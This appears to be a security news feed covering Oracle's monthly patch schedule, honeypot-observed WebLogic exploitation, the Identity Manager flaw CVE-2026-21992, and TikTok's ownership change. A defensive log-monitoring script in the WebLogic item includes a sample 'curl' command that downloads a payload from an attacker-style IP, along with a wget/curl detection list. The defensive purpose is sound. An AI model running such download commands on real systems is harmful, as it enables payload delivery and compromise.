  • ✇Security | CIO
  • Oracle will patch more often to counter AI cybersecurity threat

Oracle will patch more often to counter AI cybersecurity threat

5 May 2026, 12:38

Oracle plans to issue security patches for its ERP, database, and other software on a monthly cycle, rather than quarterly, to respond to the increased pace of AI-enabled software vulnerability discovery.

Other software vendors, notably Microsoft, SAP, and Adobe, already release patches on a monthly beat, always on the second Tuesday of each month.

Oracle, though, is taking an off-beat approach: It will release the first of its monthly Critical Security Patch Updates (CSPUs) on May 28, the fourth Thursday, and after that, it will release its patches on the third Tuesday of each month — a week after the other vendors — with the next batches arriving on June 16, July 21, and August 18, it said earlier this week.

The new CSPUs “provide targeted fixes for critical vulnerabilities in a smaller, more focused format, allowing customers to address high-priority issues without waiting for the next quarterly release,” Oracle said.

It will issue a cumulative Critical Patch Update each quarter, so on the same schedule as before. The first one this year came in January.

Oracle initially announced the switch to a monthly patching schedule last week, but did not provide the dates.

The new patching rhythm will primarily interest customers running Oracle applications on premises or in their own or third-party hosting environments. For customers using the software in an Oracle-managed cloud, Oracle applies the patches automatically.

Oracle is using artificial intelligence to identify and fix the vulnerabilities faster than before. It said it has access to OpenAI’s latest models through that company’s Trusted Access for Cyber program, and to Anthropic’s Claude Mythos Preview.

Mythos has contributed greatly to concerns that AI will uncover thousands of zero-day flaws in software, but as of mid-April, only one vulnerability report had been tied directly to it.

This article first appeared on CSO.

  • ✇Cyber Security News
  • Hackers Actively Exploiting Critical WebLogic RCE Vulnerabilities in Attacks Abinaya

Hackers Actively Exploiting Critical WebLogic RCE Vulnerabilities in Attacks

1 April 2026, 10:01

A recent cybersecurity study reveals that threat actors are moving faster than ever to weaponize new software flaws.

According to data collected from a high-interaction honeypot, hackers are actively exploiting a newly disclosed, maximum-severity vulnerability in Oracle WebLogic Server.

The critical flaw, tracked as CVE-2026-21962, carries a CVSS score of 10.0. It allows unauthenticated attackers to execute arbitrary remote code (RCE) on vulnerable servers via the WebLogic Console.

Security researchers observed attack attempts immediately after the exploit code was published online on January 22, 2026.

This lightning-fast exploitation highlights the extreme risk posed to organizations running unpatched instances.

Honeypot Captures Automated Attacks

To understand the threat landscape, researchers deployed a high-interaction honeypot that mimics a vulnerable Oracle WebLogic Server (version 14.1.1.0.0) for 12 days.

The system quickly captured a massive surge in malicious traffic. Attackers primarily used rented Virtual Private Servers (VPS) from popular hosting providers, such as DigitalOcean and HOSTGLOBAL.PLUS, to launch high-volume, automated scans while hiding their true locations.

Instead of carefully targeted strikes, threat actors used a broad “spray and pray” approach.

Automated tools like libredtail-http (generating over 1,000 requests) and the Nmap Scripting Engine flooded the honeypot with malicious requests.

While the primary goal was compromising the new CVE-2026-21962 flaw via specific ProxyServlet HTTP GET requests, attackers also heavily tested the server for older, unpatched vulnerabilities.

The data confirms that cybercriminals do not just chase new zero-days; they also rely heavily on older, proven exploits.

The honeypot recorded steady attacks against several historical WebLogic vulnerabilities:

  • CVE-2020-14882 and CVE-2020-14883: Critical RCE flaws (CVSS 9.8) targeting the administrative console by bypassing authentication.
  • CVE-2020-2551: A severe deserialization vulnerability in the IIOP protocol that allows remote attackers to execute arbitrary code.
  • CVE-2017-10271: An older but highly reliable XML deserialization flaw in the WLS-WSAT component, often exploited via crafted SOAP requests.

Interestingly, the automated scanners also identified completely unrelated vulnerabilities, such as bugs in Hikvision cameras and in PHPUnit, proving that attackers constantly cast a wide net, looking for any open door.

Mitigation Steps

The rapid weaponization of CVE-2026-21962 means organizations must act immediately to secure their networks.

According to CloudSEK, cybersecurity experts recommend the following critical defenses:

  • Apply Patches Immediately: Administrators must install the latest Oracle Critical Patch Updates (CPUs) across all components, prioritizing fixes for CVE-2026-21962.
  • Restrict Console Access: The WebLogic administrative console should never be exposed directly to the public internet. Secure it behind a strict VPN or internal firewall.
  • Deploy a Web Application Firewall (WAF): Configure WAF rules to detect and block malicious path traversal requests, Deep Packet Inspection (DPI) evasion attempts, and known exploit signatures.
  • Monitor System Logs: Watch closely for unusual administrative access attempts or for the sudden execution of suspicious operating system commands such as wget or curl.
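Two of the recommendations above (keeping the console off the public internet, and watching for wget or curl launched by the server) can be turned into a small log-monitoring check. The Python below is an added example, not code from the article or from CloudSEK; the access-log layout, the management network 10.10.0.0/24, the service account name "oracle" and every sample record are constructed assumptions.

```python
import ipaddress
import re

# Assumptions for this example: the admin console is only legitimately reached
# from 10.10.0.0/24, and the WebLogic process runs as the local account "oracle".
ADMIN_NETS = [ipaddress.ip_network("10.10.0.0/24")]
WLS_ACCOUNT = "oracle"
SUSPICIOUS_BINS = {"wget", "curl"}

# Common/extended access-log shape: ip ident user [ts] "METHOD path proto" status size
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def console_access_from_outside(lines: list[str]) -> list[dict[str, str]]:
    """Return /console requests whose source IP is not inside ADMIN_NETS."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the monitor
        if not m.group("path").lower().startswith("/console"):
            continue
        try:
            src = ipaddress.ip_address(m.group("ip"))
        except ValueError:
            hits.append({**m.groupdict(), "reason": "unparseable source ip"})
            continue
        if not any(src in net for net in ADMIN_NETS):
            hits.append({**m.groupdict(), "reason": "console access from non-admin network"})
    return hits

def downloads_by_service_account(events: list[dict[str, str]]) -> list[dict[str, str]]:
    """Flag wget/curl executions attributed to the WebLogic service account."""
    return [
        ev for ev in events
        if ev.get("user") == WLS_ACCOUNT
        and ev.get("exe", "").rsplit("/", 1)[-1] in SUSPICIOUS_BINS
    ]

# Constructed sample input (not real traffic or process telemetry).
SAMPLE_ACCESS = [
    '10.10.0.7 - - [01/Apr/2026:09:12:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2210',
    '203.0.113.45 - - [01/Apr/2026:09:12:44 +0000] "GET /console/ HTTP/1.1" 302 0',
    '198.51.100.9 - - [01/Apr/2026:09:13:02 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 815',
    'not an access log line',
]
SAMPLE_EVENTS = [
    {"user": "oracle", "exe": "/usr/bin/java", "cmdline": "java weblogic.Server"},
    {"user": "oracle", "exe": "/usr/bin/curl", "cmdline": "curl -sO http://203.0.113.45/p"},
    {"user": "root", "exe": "/usr/bin/wget", "cmdline": "wget https://updates.example/patch.zip"},
]

if __name__ == "__main__":
    for h in console_access_from_outside(SAMPLE_ACCESS):
        print("ALERT", h["ip"], h["path"], h["reason"])
    for e in downloads_by_service_account(SAMPLE_EVENTS):
        print("ALERT", e["user"], e["cmdline"])
```

The root-owned wget in the sample is deliberately not flagged: the check keys on the service account, since a patch download by an administrator is expected while a download by the WebLogic process is not.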

Leaving a WebLogic server exposed and unpatched is virtually guaranteed to result in a total system compromise.


The post Hackers Actively Exploiting Critical WebLogic RCE Vulnerabilities in Attacks appeared first on Cyber Security News.

  • ✇Firewall Daily – The Cyber Express
  • Oracle Issues Emergency Patch for Critical Flaw Enabling Remote Code Execution Ashish Khaitan

Oracle Issues Emergency Patch for Critical Flaw Enabling Remote Code Execution

24 March 2026, 06:24


Oracle has released an emergency out-of-band patch to address a critical vulnerability, tracked as CVE-2026-21992, that affects two core enterprise products: Oracle Identity Manager and Oracle Web Services Manager. The flaw, disclosed on March 19, 2026, carries a CVSS v3.1 base score of 9.8, placing it in the highest severity category and prompting an urgent advisory from the company’s Integrated Cyber Center (ICC).

The vulnerability is notable because it can be exploited without authentication, meaning an attacker with network access could trigger remote code execution on affected systems over standard HTTP, without valid login credentials. The advisory explicitly warns that successful exploitation “may result in remote code execution”.

What’s Affected: Products, Versions, and Risk

The vulnerability affects specific versions of two products within Oracle’s Fusion Middleware suite:

  • Oracle Identity Manager, versions 12.2.1.4.0 and 14.1.2.1.0
  • Oracle Web Services Manager, versions 12.2.1.4.0 and 14.1.2.1.0

In Identity Manager, the vulnerability resides in the REST WebServices component of the product, while in Web Services Manager it impacts the Web Services Security module. An attacker who successfully exploits this flaw could potentially take full control of systems running these services, manipulating identity governance workflows or altering security policies for other applications and services.

According to Oracle’s advisory, the flaw’s low attack complexity and lack of authentication requirements increase the likelihood that opportunistic attackers could probe exposed systems and achieve remote code execution. For enterprises, this means that externally accessible instances of Identity Manager or Web Services Manager are particularly at risk until the patch is applied.

Patch Release and Support Guidance

Oracle delivered the fix via a Security Alert, an emergency update process used when a vulnerability is too severe to wait for the regular quarterly Critical Patch Update cycle. The company strongly recommends that customers apply the patches or mitigations provided in this alert “as soon as possible” and remain on supported versions of their products.

However, the patches are only available for versions currently under Premier Support or Extended Support. Systems running older or unsupported releases may not receive the update, which Oracle warns could leave those installations vulnerable unless they are upgraded to a supported version.

Exploitation in the Wild: What’s Known

To date, Oracle has not confirmed that the vulnerability has been actively exploited in real-world attacks, and the advisory does not reference any specific incidents of active exploitation. The company declined to comment on this when asked by security outlets, leaving uncertainty for defensive teams about whether the vulnerability is already being targeted by threat actors. This lack of transparency is notable, especially given recent history: in November 2025, Oracle released a patch for another critical unauthenticated remote code execution vulnerability in Oracle Identity Manager that was later confirmed by independent researchers to have been exploited as a zero-day prior to the patch.

Wider Security Context

The significance of the advisory is heightened by recent attacks targeting Oracle products. For example, vulnerabilities in Oracle’s E-Business Suite (EBS) were leveraged in a large-scale data theft campaign affecting more than 100 organizations, though Oracle has not publicly tied specific CVEs to those incidents.

Security professionals warn that identity management infrastructure such as Oracle Identity Manager is often a high-value target because it governs access across an enterprise. A full compromise of such systems could enable credential theft, privilege escalation, lateral movement, and broader network compromise.

  • ✇Security Affairs
  • Oracle fixes critical RCE flaw CVE-2026-21992 in Identity Manager Pierluigi Paganini

Oracle fixes critical RCE flaw CVE-2026-21992 in Identity Manager

22 March 2026, 12:37

Oracle fixed a critical severity flaw, tracked as CVE-2026-21992, enabling unauthenticated remote code execution in Identity Manager.

Oracle released security updates to address a critical vulnerability, tracked as CVE-2026-21992 (CVSS score of 9.8), affecting Identity Manager and Web Services Manager.

The flaw lets unauthenticated attackers over HTTP take control of Oracle Identity Manager and Web Services Manager, risking full system compromise with severe impact on data and availability.

“This Security Alert addresses vulnerability CVE-2026-21992 in Oracle Identity Manager and Oracle Web Services Manager. This vulnerability is remotely exploitable without authentication. If successfully exploited, this vulnerability may result in remote code execution.” reads the advisory.

“Oracle strongly recommends that customers apply the updates or mitigations provided by this Security Alert as soon as possible. Oracle always recommends that customers remain on actively-supported versions and apply all Security Alerts and Critical Patch Update security patches without delay.”

The issue is labeled as “easily exploitable.”

The vulnerability impacts Oracle Web Services Manager and Identity Manager versions 12.2.1.4.0 and 14.1.2.1.0.

Oracle did not reveal if the vulnerability was exploited in attacks in the wild.

In November 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Oracle Fusion Middleware flaw, tracked as CVE-2025-61757 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog.

The vulnerability is a missing authentication for a critical function that can result in pre-authenticated remote code execution. The flaw is easily exploitable and allows an unauthenticated attacker with HTTP network access to compromise Identity Manager, enabling a full takeover of the system.

The flaw impacts versions 12.2.1.4.0 and 14.1.2.1.0. Oracle addressed the flaw with the release of Oracle Critical Patch Update Advisory – October 2025.

Adam Kues and Shubham Shah of Assetnote reported the vulnerability.

SANS researcher Johannes B. Ullrich recently reported that an analysis of his organization’s honeypot logs revealed multiple HTTP POST attempts between August 30 and September 9, 2025, targeting the Oracle Identity Manager endpoint associated with CVE-2025-61757. The scans originated from different IPs but used the same user agent, suggesting a single attacker. The 556-byte POST payloads indicate likely exploitation as a zero-day, weeks before Oracle released a patch. Attempts came from 89.238.132[.]76, 185.245.82[.]81, and 138.199.29[.]153.


Pierluigi Paganini

(SecurityAffairs – hacking, Oracle Identity Manager)

  • ✇Security Boulevard
  • TikTok’s New U.S. Deal and Privacy Policy: What Users Don’t Understand Tom Eston
    TikTok has shifted to a majority-American entity, TikTok USDS Joint Venture, LLC, to comply with U.S. national security requirements and avoid a ban. This week we discuss why a recent privacy policy update went viral—especially language about sensitive data like immigration status and precise location—and argue much of it reflects longstanding practices and required California […] The post TikTok’s New U.S. Deal and Privacy Policy: What Users Don’t Understand appeared first on Shared Security Po
     
  • ✇Malwarebytes
  • What can’t you say on TikTok?

What can’t you say on TikTok?

22 February 2026, 20:08

This week on the Lock and Code podcast…

A funny thing happened on TikTok last month, and it has brought allegations of censorship, manipulation, and control.

It was the week of January 22, and after a long legal battle, TikTok had finally—for the first time in its company history—moved its ownership to new, American stewards. But with the American restructuring, TikTok users immediately reported that something had changed: videos would sometimes fail to record any views, and even direct messages would fail to send. But, according to user complaints, the flaws weren’t random. Instead, they befell users who spoke openly about topics that have become political lightning rods in the US, including Immigration and Customs Enforcement and the actions of sex offender Jeffrey Epstein.

To some aggrieved users, the flaws looked like censorship. But, according to TikTok, the error messages and missing video count tallies were part of a larger power outage.

“Since yesterday we’ve been working to restore our services following a power outage at a US data center impacting TikTok and other apps we operate,” TikTok wrote on the social media platform X (formerly Twitter). “We’re working with our data center partner to stabilize our service. We’re sorry for this disruption and hope to resolve it soon.”

While TikTok reportedly has more than 200 million users in the US alone, it’s far from a universal app. But the changes made to TikTok hint at a bigger sea change in social media and the internet today, in which online spaces are increasingly being altered, shut down, or even controlled—if not through government plot then certainly through corporate influence.

Oddly, the ownership change of TikTok was supposed to solve many of these problems.

Since TikTok’s 2017 founding in China, American lawmakers and government officials claimed that American users were vulnerable to Chinese surveillance. All the data that Americans hand over when using TikTok—their names and email addresses, but also their viewing habits, interests, behaviors, political inclinations, and approximate locations—all of that, the argument went, should not belong in the hands of a foreign power.

As FBI Director Christopher Wray said in 2022, the risk of TikTok was:

“The possibility that the Chinese government could use [TikTok] to control data collection on millions of users or control the recommendation algorithm, which could be used for influence operations.”

But the rocky start to the new American TikTok has only drawn renewed scrutiny: Have the past concerns about foreign manipulation now become current concerns about domestic manipulation?

Today on the Lock and Code podcast with host David Ruiz, we speak with Zach Hinkle, senior social media manager for Malwarebytes, and MinJi Pae, social media content creator for Malwarebytes, about what they personally experienced during TikTok’s transition to American owners, why the changes matter for the delivery of news and information, and how the internet appears to be shrinking from its earlier promises.

As Hinkle said on the podcast:

“The idea of the internet being a private, free space that was ingrained in its creation, and every platform since then sort of carried that spirit with it… those spaces are disappearing.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

